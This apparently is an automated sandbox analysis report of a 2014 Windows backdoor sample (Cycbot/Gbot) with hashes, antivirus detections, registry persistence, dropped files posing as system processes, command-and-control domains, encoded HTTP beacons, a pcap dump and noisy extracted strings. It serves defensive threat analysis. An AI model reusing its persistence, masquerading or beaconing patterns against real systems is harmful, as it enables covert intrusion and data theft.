Analysis Date2014-06-05 23:42:41
MD5b76ba3ce82337e9ad69264a342da13dd
SHA17e1a65476cc4a54c85bfbbead84bf14e548d1f74

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 825920f710ff16d870b181bd99a5e418 sha1: 6026320929d976343765648aecde11b378fb9b30 size: 111104
Section.rdata md5: 2d61be64a53cf5503a97ebf7243558c8 sha1: 8ba07d8a6f03b5aa1a0e5c83ac80f182feab2b2b size: 1024
Section.data md5: b8185363827062fc6c37922c312de4d2 sha1: 153fa1b673d25ca8c5fcf15e53a082886c43fa9d size: 67584
Section.reloc md5: 4ef2908b2174fa9ed2e5f8530f8e2c83 sha1: dabf91825a2e210cb63988904e3e240aeca0a3d0 size: 1024
Timestamp2005-09-12 21:03:24
PEhash627a6427558dcd63bfade9db2f2a10b79e5851b1
IMPhashd3465b47616aa9a80df61c122c2f356f
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot.73
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Cycbot.AD
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyBackdoor.Win32.Gbot.ogk
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwinpe/Cycbot.EC
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSyourblogresources.com
Winsock DNScoolmediastore.com
Winsock DNSonlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSonlineinstitute.com
Type: A
67.227.195.200
DNSzonedg.com
Type: A
208.73.211.199
DNSzonedg.com
Type: A
208.73.211.196
DNSzonedg.com
Type: A
208.73.211.172
DNSzonedg.com
Type: A
208.73.211.152
DNSzonedg.com
Type: A
208.73.211.235
DNScoolmediastore.com
Type: A
DNSyourblogresources.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo.jpg?v83=87&tq=gHZutDyMv5rJejfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.199:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.199:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f2e 6a70673f 7638333d 38372674   ogo.jpg?v83=87&t
0x00000020 (00032)   713d6748 5a757444 794d7635 724a656a   q=gHZutDyMv5rJej
0x00000030 (00048)   66696139 6e726d73 6c366769 577a2532   fia9nrmsl6giWz%2
0x00000040 (00064)   424a5a62 56794125 33442048 5454502f   BJZbVyA%3D HTTP/
0x00000050 (00080)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206f6e    close..Host: on
0x00000070 (00112)   6c696e65 696e7374 69747574 652e636f   lineinstitute.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000a0 (00160)   6c6c612f 322e300d 0a0d0a              lla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53253246   ij%2B82uYvEaS%2F
0x000000c0 (00192)   54253242 73717853 72253246 65253242   T%2BsqxSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
..
IWW
9`
.
1#
35b
.J.

080904b0
1.0.0.1
1509
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
``<[,`
^^^^^^^
^^^^^^^^^^^^^
~~~~~~~~~~~~
~~~~~~~~~~~~~
<<<<<<
<<<<<<<
<<<<<<<<<<<<<<<<
<<<<<<<<<<-
>>>>>>>>>>
|||||||||||
|||||||||||||||
  ,  ,` 
,,,,,,
,,,,,,,
;;;;;;
:||**********
::::::::::
!!!!!!!!
!!!!!!!!!!!
!!!!!!******
///////
. `,  
.........
''''''''
""""""
"@@* `$
(((((((((((((
((				
)))))))))
]]]~~~~/
{{{{{{{{{{
****"""""
******
\\\\\\\\
&&&&&&&&&
+++++++
<0>FxG
111111111
*****1111nn
1{"@ h
;;;;;;222222
222222222
;26B"	i
2GpcK	
]	2o_R
:2w?"J
333333aa
3a?8EJ
`3Bb<.
@`~3By
3DcKNH
3NZE3S[
3+^OhL
3x5'oXg
<|3Zlk|
`4-}0dk
444###############///////
44444444444444444444
  47v4
%4?M8R
>4RV9j
4s\gKb
-4W"  
]5"  ]
>>55555
555555555555555
5555555FFF
5h:XGZ
\5YOmz
65&``8
666666|||||||||||||||||||||||
66666666
67-a02
6"l#hE
6R7%#,AM
6uLi,6
6`X1Y?
.[6^yY9\|-
777777777
/?7b':
;7nodf
{7S4lHR
7uI=pug
])7Z}<#
85wU@>
;;;;;;;;;;;88
88888888
8FAgSi
.``8k<
8,@ 's
8UEI]k
~8/zrVy
9@2v&@
^^^9999999??***
!;99(q
9!/~C%
9{DB\9
9QG~{^
@9yt;IV
`A9-EW
A!9M4_
]]]]]]aaa
$$$$AAA
AAA333A
AAAAAA
A$BE23
ahJ+i-T
AnH03g
Atntz\
b]09Qz
B=6mN<
bbbbb{
BBBBBB
BBBBBBBBBBrrr[
BBBBBB..cc>>>>xx
<=?B#h
bvsEQI<
 `BW2y
,,,,,,,,,,C
ccccccccccccccc
CCCCCCCCCCCCCCCC
ccccccccccccccccc
CCNNNeeee
cHoR7#
cwt{T%X
d}2BEP
@.data
?--dB/O
	|`Dd5
|||dddd
dddddd
DDDDDDDDDDD
`DDDttttt
d|IP	H>
~D. @O
Dou!Co
dpi"S#
`dqnF$
dQ-ww@
DuplicateHandle
D%Y0s>
  @E}7]
e7cG$@
-eC|,>d
}ed$Ch
-EEE________
EEEEEE
eeeeeeeee
EEEEEEEEEEEEEE
Ehph)Y
EnumResourceNamesW
Eo>=1)K
>Eoe'_
EY]AOB
f*  <%)
FD	Hb>A
FFFFFF----
fffffffffffff
ffffffffffffffff
ffs^vr
FindClose
FindFirstFileA
FindResourceExA
Fjjjjjjjj
FlushInstructionCache
( @Fo;
fP@	Rh
|F!qTuH-|)
F(rF9v
 :FTc>
g. @. 
"``G:;
\G5R't
gd91Og
`G-_dy
GE#GwW
GetModuleFileNameW
GfJ^Uj
GGGGGGGGGA
gggggggggggggggggg
}G*@@Zs`*
gzx2?R
h[0rwM
'H)2):Q
	h4}v^L
ha)gC-
hQ@'_[
;HQWA2
hRR{(@@u
hT3prp
/h,`V1K
i{1=2( @y
)ihd>Y@{0
I:=i: e
iiggggg
iiiiii
IIIIII
IIIjjjjjjjjx
****iiiPP
iLnmLX
it26gr
Itg/t<
iTk6A]<
^/i|wZ
I%zx<Cx
jBco;E
jjjjjj
jjjjjjj
jjjjjjjj
JJJJJJJJ
j;;TsI
jUAl*%
Jy^_T]
JZ4vqOs
K&@ 2^
@ @`\K4w
k555555555
-`KCuP
KERNEL32.dll
Kga=	s_
  KKKKK
kkkkkkkEEEEEEEEEEEEElll
<-K:oaB
 kOYQ|
`'|kQ2
k'tX&5zB
K.@`V	
k+<vSN
k***VV
l3+<clV
l9NG>0UxB
!l#hx\yQ
lllFFFFFF
LLLLLLffffffffBBBBBBBB
LLLLLLLL!
LMtd;Un
lNfef\
"Lrz3z8
MapViewOfFile
 `Mci~
m~kBz1
(ML4u(J
MMMMMMMM
mmmmmmmmm
mmmmmmmmmmmmmmvvv
mmm&QQ
mtT$#c
m'v/#la
N0CP/~8
-ncd=0'
NdrComplexArrayFree
	(@`=nF*
NN55555555555
NNDDDDD{{
NnGvVQ
NNNNNN
NNNNNNN
nnnnnnnnn
NPkv+]W
Nsy:ar
@(@@Nt
"#n:T0
``& @o
O1,`@Hj%[uu
oBOQd(
oIjDgIg
Oo2	jOQ$
oooooo......
oooooooooooo
&oq%fR
@`Ot{a
owu9{v
ox>iWX?
`{P$@ 
,p	4+S
P4yMz5
@p:6]x!h
PathAppendW
PathCombineW
PathFileExistsW
PathRemoveFileSpecW
p"@`c:6
P?k5,/
PkRh*'
ppppp111
pppppppp
\^P`^R
;;;;;;;;;;Q$
q7(@@B
qGKpPveL
ql;n"x
$^ qo*
>}q)Q{
QQQQQQ
QQQQQQQ
qqqqqqqqqq1111
q/r{#)7
qThhiv
?QublS
.q'&vkd;0c
\q,z(i
~R7?;9
R)cm5X
`.rdata
r\)Dur
.reloc
renAp&
RPCRT4.dll
RRR/++++
rrrrrrRR
,}~S},
s0n;}L
s3p:'TDyb
SetLocaleInfoW
s{f@-B
sGXX)&@
SHELL32.dll
Shell_NotifyIconA
SHGetValueW
SHLWAPI.dll
Sj.8^9
S*  Jo
@SO5FJ
]SQ=bL
sssssss
s[W4y!E
s#{{y(@
szZF].
T7777777777yyyyyyy0AAAA||VVVVVVV
@`TfFSs
)'$T)g129
!This program cannot be run in DOS mode.
timeEndPeriod
ttttt..
TTTTTT
tttttttt       
TTTTTTTTTLL
tttttttttt
**tttttttttttttt
Tu}Y/1
^]t>yP
u!!!!!
U\6m}j
:U^|8g
u9A\{8
:U*e;h
u)?]id
UixGk0
=?-UKy5i
_>uNf1
UnmapViewOfFile
 >U`O 
####UU
UuidCreate
UURRRRRRR@@@@@@@@@@
uuuuuu
UUUUUUlllll
uuuuuuuuuuuuuuu
u>vJc]
U,  W2r
`"uyX`
,:vA^W
VF1N[%
vF* @gT
"@`VqL
VsH!vPI
VT<\K/it
vvvvvvvvvvvv
/w&%&|
`W3n6g9
w"` 42
W9YH3l
?wB,v])Y
?*` Wc
Wggggggg
wgSSc|
WJj>g1Kx|
wj/rZ|
Wmy{Yy
wRv'"U
www;;;;NNNNNNN
WWWWWWWWWWWWWFFFFFF
wXg:}T
Wz}JD>
x5uy4ql
X*,,66666666666
^Xd[M `
@.@`XMZB
XR2	jD
)xrV~5
x'RWp91
@ XSK1>\j
'Xv9(@
x(`@wdBA
`````xxxx
yA1He	yK
YCs]x}}
YD0G{u
yG~)e#
Y@]jK.` 
yq+1i4
YW|46p6
YWMt6]n
yyyttttt
yyyyyyyyyy
yyyyyyyyyyyyyyy%%%%%%%%%%%%%%%%%
|)z) ;
++++++++++++Z
Z_/2.I
z_)66Ky
 @`za$
{ZeBig
-+zGoH
zH.p)cO
z/ip\j
 &Zn<1k
-zpY<{
`zv:Mr
ZX5VlY5I
z_Z>{C
ZzH7k#
zzI00000000
ZZZZZZZZ
ZZZZZZZZZ